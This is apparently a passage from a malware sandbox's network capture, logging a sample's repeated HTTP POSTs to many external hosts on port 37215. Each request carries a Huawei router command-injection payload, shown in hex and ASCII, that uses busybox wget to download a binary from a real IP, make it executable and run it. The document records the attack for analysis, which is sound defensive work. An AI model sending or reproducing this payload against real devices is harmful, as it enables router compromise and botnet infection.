                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              40192.168.2.1558562138.31.135.2037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033544064 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              41192.168.2.1560212190.127.127.11737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033596039 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              42192.168.2.1541996197.155.20.6537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033626080 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              43192.168.2.1550494138.20.236.937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033627033 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              44192.168.2.1556438181.175.29.22637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033674002 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              45192.168.2.154858045.70.109.4737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033684015 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              46192.168.2.1537440190.75.122.5937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033690929 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              47192.168.2.1545172121.90.138.9837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033765078 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              48192.168.2.1543904157.228.80.24337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033771992 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              49192.168.2.1535062157.38.243.21037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033844948 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              50192.168.2.154031891.244.7.25537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033844948 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
